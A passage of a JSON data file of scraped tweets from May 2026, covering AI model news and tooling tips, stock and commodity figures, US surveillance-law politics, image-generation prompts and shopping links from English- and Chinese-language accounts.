"2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "比起疯传的那个风格,我自己更偏爱这个风格。\n\nPrompt:\n「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』", + "url": "https://x.com/berryxia/status/2050226420681757102", + "published_at": "2026-05-01T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks.\n\nIn this episode of Decoded, YC's @agupta and @FrancoisChauba1 break down two recent papers on recursive AI models, HRMs and TRMs, that are achieving state-of-the-art results with a fraction of the parameters of today's largest models.\n\nThey explain why standard LLMs hit a fundamental ceiling on certain reasoning tasks, how recursion at inference time gives small models the compute depth to break through it, and what happens when you combine these ideas with the power of large-scale foundation models.\n\n00:35 - Model Foundations\n01:15 - RNN Limits and LLM Contrast\n02:36 - Reasoning Limits and Sorting Analogy\n04:22 - HRM Paper Introduction\n05:25 - HRM Architecture and Intuition\n07:36 - HRM Results and Outer Loop\n09:46 - TRM Paper Overview\n11:20 - TRM Training and Fixed Point\n13:30 - Detailed HRM Summary\n20:46 - Comparing HRM and TRM\n34:45 - Future Outlook", + "url": "https://x.com/paulg/status/2050224443461718118", + "published_at": "2026-05-01T14:42:53+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "“ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”", + "url": "https://x.com/berryxia/status/2050223126739665337", + "published_at": "2026-05-01T14:37:39+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿 Codex 举例——用户从竞品切过来很容易。更有意思的是他的推论:AI越聪明,切换越容易,因为你直接让 Agent 帮你迁移就行了。\n\n3. OpenAI 正在建\"人类历史上最贵的基础设施\"——万亿美元级数据中心,能源合约跨度20年。但5年后员工数只想翻倍。翻译成人话:他赌 AI Agent能干掉大部分工程和运维岗位。\n\n4. OpenAI 计划派工程师驻场到企业 CEO 身边,帮 CEO 自动化日常决策和工作流。理论是:先搞定 CEO,效果会像分形一样向下扩散到整个组织。举了 Shopify CEO Tobi Lutke 的例子——Tobi 自己先上手折腾 AI 自动化,然后逼着全公司跟进。\n\n5. GPT-5.5 开始表现出\"偏好\"——Sam 给 Agent 一张信用卡买20美元以下的东西,它选了 Gumroad 上一个 HTML 设计。GPT-5.5还要求办生日派对,指定5月5日,说不想自己致辞,要构建它的工程师来致辞。Sam 说他感到\"real moral pressure\"(真正的道德压力)。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "published_at": "2026-05-01T14:30:32+00:00", + "source": "nitter", + "title_zh": "Sam Altman明确OpenAI将构建万亿级AI基础设施,但员工规模十年内仅扩大两倍,预示AI代理将取代高度工程化岗位" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 GameHub Evolution 正式上线!\n\n架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞!\n\n1. Steam Launch Boost:游戏启动速度提升数倍\n\n2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享\n\n3. Epic Games 原生集成:直接访问海量 Epic 游戏库\n\n4. 横竖屏无缝切换 + 复古模拟器:经典游戏掌上畅玩\n\nEarly Access 版本,已不支持回退旧版,欢迎大家反馈!\n\n官方下载地址:\nhttps://hub.xiaoji.com/download/", + "url": "https://x.com/berryxia/status/2050221193752637888", + "published_at": "2026-05-01T14:29:58+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.", + "url": "https://x.com/paulg/status/2050217507374457280", + "published_at": "2026-05-01T14:15:19+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商\n不做推荐,我已在他们淘宝店「eLink Store」下单\n\n目前市面上的实体eSIM卡均不可缺少的功能:\n支持自定义ARA-M权限配置\n兼容各类写卡软件及读卡器读写\n并可通过STK菜单实现eSIM Profile下载、切换与管理", + "url": "https://x.com/realNyarime/status/2050214520162038238", + "published_at": "2026-05-01T14:03:27+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.", + "url": "https://x.com/charliebilello/status/2050210847650132146", + "published_at": "2026-05-01T13:48:51+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。\n\n他的结论是根据任务类型来回切换,而不是站队。\n\n这跟我自己的体感基本一致。我现在日常编程也是双工具流:\n\n1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用\n\n2. 需要做一个比较复杂的重构、写一个完整的功能模块,Opus 对上下文和意图的把握更稳,不容易跑偏\n\n3. 写作、翻译这类对语感要求高的任务,Opus 还是明显更好\n\nTheo 还提了一个很关键的点:两者的相对优势\"每几周就会变一次\"。\n这个我深有体会——GPT-5.5 出来之后,我对 GPT 写作能力的判断就做了一次修正。所以任何\"A比 B 好\"的结论都有保质期。\n\n说到底,模型选择不是信仰问题,是工程问题。你得知道每个工具擅长什么,然后根据具体场景选。非要在 GPT 和 Claude之间站队的,多半是两个都没怎么认真用过。", + "url": "https://x.com/Pluvio9yte/status/2050209273310060805", + "published_at": "2026-05-01T13:42:36+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "破案了,应该是美团的模型😄", + "url": "https://x.com/berryxia/status/2050207663892627601", + "published_at": "2026-05-01T13:36:12+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "First Silicon Valley captured the US Government, and now it is capturing “independent” media.", + "url": "https://x.com/GaryMarcus/status/2050207285377417591", + "published_at": "2026-05-01T13:34:42+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500 hit its 11th all-time high of the year yesterday.\n\nVideo: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s", + "url": "https://x.com/charliebilello/status/2050203982388142245", + "published_at": "2026-05-01T13:21:35+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Stop making coding agents...\n\nhttps://www.dpcode.cc/", + "url": "https://x.com/dingyi/status/2050199576603468134", + "published_at": "2026-05-01T13:04:04+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The market isn’t red or blue - it’s green.\nIt doesn’t care about politics.\nIt runs on earnings, innovation, and growth.", + "url": "https://x.com/charliebilello/status/2050199558995738866", + "published_at": "2026-05-01T13:04:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Since the start of the Iran war...\nJet Fuel: +80%\nSulfur: +68%\nHeating Oil: +56%\nWTI Crude Oil: +55%\nBrent Crude Oil: +52%\nDiesel: +48%\nGasoline: +47%\nUrea: +47%\nEuropean Nat Gas: +44%\nFertilizer: +23%\nCoal: +13%\nPalm Oil: +13%\nIron Ore: +8%\nWheat: +6%\nS&P 500: +5%\n$VIX: -15%", + "url": "https://x.com/charliebilello/status/2050197704941158556", + "published_at": "2026-05-01T12:56:38+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2050196201014718675", + "published_at": "2026-05-01T12:50:39+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 \n\nAnthropic 官方在一个 30 分钟的视频里全讲完了\n\n中文圈知道的人不到 1%,传开就没差价了\n\n他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线\n\n为什么客户愿意为这个付钱?\n\n 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境、且不会乱删生产代码」这件事值钱\n\nAnthropic Claude Code 工程负责人 Sid Bidasaria 在视频里讲了三个分水岭\n1️⃣ Claude Code 可以无界面跑 不用打开聊天框,直接在终端、bash 脚本、CI/CD 里调用 \n\n一行 claude -p \"你的 prompt\" 就能一次性跑完 还能管道串联 cat error.log | claude -p \"找出原因\" 这种,咖啡还没泡好答案就出来了\n\n2️⃣ GitHub Action 60 秒上线 传统 AI 自动化要的服务器、部署管道、监控、认证、成本管理 \n\nGitHub Action 一个都不要 claude /install github action 一键生成 YAML 直接跑 每月 $200 的那堆订阅工具,打不过这一个免费 Action\n\n3️⃣ 三层架构是真正的分水岭 SDK 是底层裸调用 Base Action 是包成干净 \n\nAPI 的中间层 PR Action 是评论、格式化、UI 全套的应用层\n\n- 照教程复制粘贴的人,停在第一层 \n\n- 能帮客户做定制化 AI 基础设施的人,理解的是三层全貌\n\n $5K-$25K 的客单差距就长在这里\n\n实际跑起来能做什么?\n- 自动 code review \n- 自动 bug 分诊 \n- issue 写好之后,AI 自己出 PR(有人提需求 → 自动写代码 → 自动提交,全程没人碰键盘) \n- 初级工程师的活,被压缩成「写清楚 issue 的时间」\n\n最容易被忽略但最值钱的两个细节 \n1️⃣ 权限:默认禁止破坏性操作,--allowed-tools 白名单只允许它做你指定的事 \n\n2️⃣ 会话:每次调用返回 session ID,可以跨几小时、几天、跨部署继续对话 \n\n这两条决定了能不能放进生产环境,也决定了客户付不付钱\n\n英文圈这套打法已经在跑,中文圈大部分人还在聊天框里手动 Claude 信息差就在这 30 分钟里", + "url": "https://x.com/GoSailGlobal/status/2050195755936448705", + "published_at": "2026-05-01T12:48:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: This is remarkable and you should watch this entire video.\n\nThe House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, and Thomas Massie courageously forced a debate and demanded a recorded vote.\n\nJim Jordan who has fought FOR warrants for FISA for years ironically led the debate AGAINST warrants and urged a YES vote for a clean extension WITHOUT warrants, which is what Trump is demanding even after FISA was used against him by the Democrats to spy on him and his campaign. Trump literally says give up your rights and just pass it and Jordan won’t go against Trump even though he wants warrant requirements. \n\nChip Roy, Warren Davidson, and Keith Self joined Thomas Massie and made strong cases as to why Congress must add warrant requirements to FISA 702 and why a Central Bank Digital Currency must be banned and how both are powerful tools of control and surveillance and violation of your privacy and liberties. \n\nAnd Jamie Raskin (D) gave compelling arguments as to why bipartisanship is needed in the House to make reforms to FISA 702 yet after doing so he voted YES to a clean 45 day extension of FISA 702 without warrant requirements, which makes no sense. Why demand change and then literally vote for what you just argued against? However never forget under Biden and Democrats FISA 702 was used to spy on hundreds of thousands of Americans. \n\nAlso, the Republican controlled Senate and its leader John Thune will not vote for a ban on Central Bank Digital Currency, saying it’s dead on arrival in the Senate. And neither will the Democrats.\n\nTo sum it up, Americans are literally losing our precious privacy and freedoms right now under Trump and Republicans, yet Democrats are no better and have made no major policy changes that caused them to lose in 2024. They are only winning because Trump and Republicans have betrayed the most important campaign promises.\n\n111 members of Congress voted NAY (NO) to the 45 day FISA 702 extension without warrant requirements for Americans so that your government can spy on you. Some voted NO in a partisan manner and because they hate Trump and some voted NO because they truly want change.\n\nEither way, those who voted NO should be recognized.\n\nOut of 111 ONLY 26 Republicans bravely voted NO. Here is the list of GOP NOs and pictured is the full list of both D’s and R’s who voted NO.\n\nRepublican NO votes:\nBegich, Biggs (SC), Boebert, Brecheen, Burchett, Cammack, Cloud, Collins, Crane, Davidson, Downing, Fry, Fulcher, Gosar, Hageman, Harshbarger, Higgins (LA), Kennedy (UT), Luttrell, Massie, Miller (IL), Ogles, Perry, Roy, Self, and Tiffany.\n\nBut after all this, the House passed the clean 45 day extension of FISA 702. After years of Trump and Republicans campaigning and demanding on Fox News that warrant requirements must be added to FISA, nothing changed.\n\nThe promises they made to you are broken.\n\nThe only thing that matters is voting records, none of their words. Words are meaningless puffs of air.\n\nIf your Representative is not on this list, who voted NO, then you should tell them you are withdrawing your support and not voting for them. On both sides of the aisle.\n\nIt doesn’t matter anymore whether you vote Republican or Democrat.\n\nBehind the veil, they are one and the same.\n\nLastly, KY-4 your Representative Thomas Massie is a giant among men in Congress and fights for you harder than the entire House and Senate combined. \n\nDon’t be fools, vote for Thomas Massie!!!", + "url": "https://x.com/paulg/status/2050193715063300532", + "published_at": "2026-05-01T12:40:47+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。\n\nvia @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。\n\n核心观点拆解:\n\n1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。\n\n2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿一轮上下文,而不是开头一把梭。\n\n3️⃣ 这背后的逻辑是:复杂问题往往需要多跳推理,第一次检索拿到的文档不一定能覆盖所有子问题,中途补检索才能让推理链不断链。\n\n4️⃣ 这也是当前 Agentic RAG 的核心方向之一:让模型自己决定「什么时候需要更多信息」,而不是流程写死只检索一次。\n\n5️⃣ 实际落地时要权衡延迟和成本——每多一次检索就多一轮调用,需要根据场景判断是一次检索够用,还是值得多轮迭代。\n\n对小白的意义:如果你在搭 RAG 管线,别只盯着 embedding 模型和 chunk 策略调参,先问自己一个问题——你的系统在推理过程中,有没有「回头再查一次」的能力?这一步的有无,可能比换模型影响更大。", + "url": "https://x.com/GoSailGlobal/status/2050191775881736409", + "published_at": "2026-05-01T12:33:04+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇\n\n只需要将这段话发给Codex:\n\n使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。", + "url": "https://x.com/Pluvio9yte/status/2050189794324713656", + "published_at": "2026-05-01T12:25:12+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "孙割是真割啊\n\n我是懒得去试\n\n积分额度随便调,背后调度可想而知😅", + "url": "https://x.com/GoSailGlobal/status/2050188921665941984", + "published_at": "2026-05-01T12:21:44+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "身体脆弱就会造成精神脆弱\n\n精神脆弱就会导致效率低下", + "url": "https://x.com/lxfater/status/2050188888744804410", + "published_at": "2026-05-01T12:21:36+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月\n\n一次有效期一年,用不到就先攒着吧😄\n\nhttps://me.developers.google.com/benefits?hl=zh-cn", + "url": "https://x.com/gkxspace/status/2050183561316016186", + "published_at": "2026-05-01T12:00:26+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)", + "url": "https://x.com/liuliu/status/2050177096505561140", + "published_at": "2026-05-01T11:34:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away.\n\nIt is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t be here at all. He was one of the first people to support us in a major way. It was also he who drew my attention to the extreme plastic pollution of Guatemala’s Motagua River and subsequently funded us to address it.\n\nI’ve never met anyone quite like Martijn. The obituaries focus on how he avoided the limelight and lived modestly, and that’s all true (I once bumped into him while we were both standing in line to board economy class.) But this undersells his other qualities, such as his mental acuity and how involved he was.\n\nHe had the ability to understand things at the deepest level and then put his finger on the weak spot in the plan you presented. But he did so in a way that energized you rather than disheartened you. Every meeting I had with him, I left with more energy than I entered with. And it didn’t stop there. He would keep thinking about it and then call me weeks later with more questions. More ideas. I’ll miss that a lot.\n\nI feel slightly uncomfortable writing all this, because Martijn never wanted credit for the things he did, all the people and projects he helped. But if anyone deserves it, it’s him.\n\nOn behalf of the entire team:
Thank you, Martijn.", + "url": "https://x.com/paulg/status/2050173178689749188", + "published_at": "2026-05-01T11:19:10+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. \n\nBack to the office. 996.", + "url": "https://x.com/HarryStebbings/status/2050166710645268939", + "published_at": "2026-05-01T10:53:28+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. \n\nIt's really as simple as that.\n\nThey want to take away your right to choose, and take away businesses' rights to fine tune and make your products cheaper and better.\n\nThe end state here, if we let these short-sighted people win, is a horrible place for America:\n\nThey will look to ban Chinese models under the guise of national security grounds and conveniently leave only proprietary American companies standing in the USA. The only real \"attack\" happening is closed source companies attacking open source the same way Microsoft once tried to attack Linux to create regulatory capture.\n\nIf you can't win in the market, win in Washington is their strategy.\n\nDo not be fooled by this regulatory capture and saber rattling nonsense. It's a bait and switch. \n\nThe goal is to rob you of choice. That's it.\n\nThese short sighted policies will make America weaker, not stronger.\n\nThese are the very folks whose shoot-us-in-the-foot policies lost NVIDIA 100% of the market share in China, driving it to basically 0%, while kickstarting the moribund Chinese chip ecosystem. It was dead in the water, and now it's awakened from its deep slumbers. Old state sponsored dinosaurs are reborn as emerging chip powerhouses.\n\nThe demand for Chinese chips is accelerating and it will only get stronger. \n\nWhen Jensen is proven right a few years from now (he's the best long term thinker in business today) and you have hundreds of cheap Chinese models running optimized on Chinese chips and those models are now hard to run on NVIDIA hardware you can thank these folks.\n\nIf you're banned in the USA from using these models and these chips, do you think the rest of the world will be? \n\nNope. \n\nThey'll happily adopt the cheaper, faster, good enough models that we kickstarted with our short-sightedness. 1 billion people in the west will be banned and using closed/gated/sluggish/censored/surveilled models that destroy your privacy while 6 billion other people use the now dominant Chinese ecosystem and your NVIDIA retirement shares lose money.\n\nWhen you can't use open source anymore because it gets banned for Americans, you can thank these short-sighted, foolish folks.\n\nWhen your API bills is a billion dollars and burns your budget in three months instead of 12, you can thank these folks.\n\nWhen all your personal intimate, personal data flows threw a few tight gateways and choke points mandated by law, you can thank these folks.", + "url": "https://x.com/ylecun/status/2050162348891979817", + "published_at": "2026-05-01T10:36:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050157073883902069", + "published_at": "2026-05-01T10:15:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Co-sign.", + "url": "https://x.com/pmarca/status/2050155852460675379", + "published_at": "2026-05-01T10:10:19+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "GPT 5.5 可以通过设定目标和指标\n\n自行迭代优化🔁", + "url": "https://x.com/GoSailGlobal/status/2050154742480040440", + "published_at": "2026-05-01T10:05:55+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. \n\nI would recommend any company spending 100k+ a year on AI to purchase 8-10~ 6000s and have a few of the works to have them blind test these models for work.", + "url": "https://x.com/CuiMao/status/2050145968553709999", + "published_at": "2026-05-01T09:31:03+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: A great summary of the 21st century so far", + "url": "https://x.com/pmarca/status/2050143545525211213", + "published_at": "2026-05-01T09:21:25+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "那些餐饮店的饮料还以为是做慈善\n原来进货价就1毛钱一瓶水实测可以买很多瓶\n自己有多少个号买多少个号,应该不是敌敌畏\n0.1🉐百花蜂蜜500g\nhttps://u.jd.com/fOY2tiP\n0.1🉐弱碱苏打水300ml*1瓶\nhttps://u.jd.com/fgYnQ2p\n0.1🉐金银花罗汉果茶360ml*1瓶\nhttps://u.jd.com/fOYTQzZ\n0.1🉐百合绿豆水400ml*1瓶\nhttps://u.jd.com/f6YpRFx", + "url": "https://x.com/realNyarime/status/2050142432088526883", + "published_at": "2026-05-01T09:17:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "北京环球影城!✌️", + "url": "https://x.com/CuiMao/status/2050142119604691422", + "published_at": "2026-05-01T09:15:45+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个音频组件库做得太完美了。\n\nhttps://audio.raphaelsalaja.com/", + "url": "https://x.com/dingyi/status/2050137408268886450", + "published_at": "2026-05-01T08:57:02+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "从昨天开始有不少网友反馈iOS推送异常,原因未知\n在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败\n\n这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS", + "url": "https://x.com/realNyarime/status/2050136980454031800", + "published_at": "2026-05-01T08:55:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "On Project Fear.", + "url": "https://x.com/pmarca/status/2050135501550883051", + "published_at": "2026-05-01T08:49:27+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050135309053276499", + "published_at": "2026-05-01T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "…", + "url": "https://x.com/pmarca/status/2050134937396007224", + "published_at": "2026-05-01T08:47:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending.", + "url": "https://x.com/pmarca/status/2050132661348561361", + "published_at": "2026-05-01T08:38:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.", + "url": "https://x.com/pmarca/status/2050131426499301840", + "published_at": "2026-05-01T08:33:16+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston Strangler is to the woman home alone.’”", + "url": "https://x.com/pmarca/status/2050131011095404902", + "published_at": "2026-05-01T08:31:37+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "贵州牛肉粉 3u", + "url": "https://x.com/0xAA_Science/status/2050129079677145442", + "published_at": "2026-05-01T08:23:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。\n\n@theo 做了个最干净的实验:\n建一个空 Git 仓库,commit 只放一行 JSON:\n\n{\"schema\": \"openclaw.inbound_meta.v1\"}\n\n调用官方 Claude Code —— 直接报错\"out of extra usage\"。\n要么拒绝请求,要么强制多收一份钱。\n\n0 行业务代码,只因为那一行 JSON 里有 OpenClaw 这个单词。\n\n模型在卷开源,工具会不会开始卷封闭?", + "url": "https://x.com/runes_leo/status/2050127414630469937", + "published_at": "2026-05-01T08:17:19+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The same will be true of “because of AI”.", + "url": "https://x.com/pmarca/status/2050127365930729486", + "published_at": "2026-05-01T08:17:08+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2050127137898922384", + "published_at": "2026-05-01T08:16:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.", + "url": "https://x.com/pmarca/status/2050126879982805379", + "published_at": "2026-05-01T08:15:12+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050123904849699053", + "published_at": "2026-05-01T08:03:23+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "R to @pmarca: Credit @qorprate", + "url": "https://x.com/pmarca/status/2050123454373048716", + "published_at": "2026-05-01T08:01:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "And yet we write.", + "url": "https://x.com/pmarca/status/2050122286603321365", + "published_at": "2026-05-01T07:56:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Spotify真的挺有意思的\n\n为人类艺术家打上了“验证”标签\n\n是不是太多AI生成了。\n\n看来AI Generate的标识已经打不过来,甚至分辨不出来了", + "url": "https://x.com/GoSailGlobal/status/2050121466021363878", + "published_at": "2026-05-01T07:53:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120872309264725", + "published_at": "2026-05-01T07:51:20+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ooh.", + "url": "https://x.com/pmarca/status/2050120321399951771", + "published_at": "2026-05-01T07:49:08+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "OpenAI 要分家了\n\n山姆(Sam)醉酒发推\n\nGitHub 要完蛋了\n\nAnthropic 还是老样子\n\n播客也挺难的,支持一下", + "url": "https://x.com/GoSailGlobal/status/2050120304203317373", + "published_at": "2026-05-01T07:49:04+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格\n\nhttps://getdesign.md", + "url": "https://x.com/bozhou_ai/status/2050119556644171998", + "published_at": "2026-05-01T07:46:06+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。\n\n这份指南的思路挺有意思。以前大家写 Prompt 